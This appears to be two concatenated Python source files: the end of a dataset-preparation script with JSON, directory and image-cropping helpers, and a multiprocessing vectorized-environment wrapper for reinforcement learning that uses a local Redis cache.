print('There are no extra files that were not in the reference dataset.')
if totalMatch:
print('The new metadata.mat is an exact match to the reference from GitHub (including ordering)')
#import pdb; pdb.set_trace()
input("Press Enter to continue...")
def readJson(filename):
if not os.path.isfile(filename):
logError('Warning: No such file %s!' % filename)
return None
with open(filename) as f:
try:
data = json.load(f)
except Exception:
data = None
if data is None:
logError('Warning: Could not read file %s!' % filename)
return None
return data
def preparePath(path, clear = False):
if not os.path.isdir(path):
os.makedirs(path, 0o777)
if clear:
files = os.listdir(path)
for f in files:
fPath = os.path.join(path, f)
if os.path.isdir(fPath):
shutil.rmtree(fPath)
else:
os.remove(fPath)
return path
def logError(msg, critical = False):
print(msg)
if critical:
sys.exit(1)
def cropImage(img, bbox):
bbox = np.array(bbox, int)
aSrc = np.maximum(bbox[:2], 0)
bSrc = np.minimum(bbox[:2] + bbox[2:], (img.shape[1], img.shape[0]))
aDst = aSrc - bbox[:2]
bDst = aDst + (bSrc - aSrc)
res = np.zeros((bbox[3], bbox[2], img.shape[2]), img.dtype)
res[aDst[1]:bDst[1],aDst[0]:bDst[0],:] = img[aSrc[1]:bSrc[1],aSrc[0]:bSrc[0],:]
return res
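# Editorial note (not in the original script): bbox is [x, y, w, h]; the source
# region is clamped to the image bounds and copied into a zero-filled h x w crop,
# so boxes extending past the image edge are zero-padded rather than raising.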
if __name__ == "__main__":
main()
print('DONE')
|
vec_env.py
|
import redis
import time
import subprocess
from multiprocessing import Process, Pipe
class VecEnv:
def __init__(self, num_envs, env, openie_path):
self.conn_valid = redis.Redis(host='localhost', port=6381, db=0)
self.closed = False
self.total_steps = 0
self.num_envs = num_envs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(num_envs)])
self.ps = [Process(target=worker, args=(work_remote, remote, env))
for (work_remote, remote) in zip(self.work_remotes, self.remotes)]
for p in self.ps:
# if the main process crashes, we should not cause things to hang
p.daemon = True
p.start()
for remote in self.work_remotes:
remote.close()
def step(self, actions):
if self.total_steps % 1024 == 0:
self.conn_valid.flushdb()
self.total_steps += 1
self._assert_not_closed()
assert len(actions) == self.num_envs, "Error: incorrect number of actions."
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
self.waiting = False
return zip(*results)
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
results = [remote.recv() for remote in self.remotes]
return zip(*results)
def close_extras(self):
self.closed = True
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
# Used in VecEnv
def worker(remote, parent_remote, env):
parent_remote.close()
env.create()
try:
done = False
while True:
cmd, data = remote.recv()
if cmd == 'step':
if done:
ob, info, graph_info = env.reset()
rew = 0
done = False
else:
ob, rew, done, info, graph_info = env.step(data)
remote.send((ob, rew, done, info, graph_info))
elif cmd == 'reset':
ob, info, graph_info = env.reset()
remote.send((ob, info, graph_info))
elif cmd == 'close':
env.close()
break
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
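# Minimal usage sketch (illustrative; `my_env` and the openie path are
# placeholders, and a local Redis server on port 6381 is assumed, as the
# VecEnv constructor above requires):
#   vec = VecEnv(num_envs=4, env=my_env, openie_path='/path/to/openie')
#   obs, infos, graph_infos = vec.reset()
#   actions = [...]  # one action per sub-environment
#   obs, rews, dones, infos, graph_infos = vec.step(actions)
#   vec.close_extras()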
|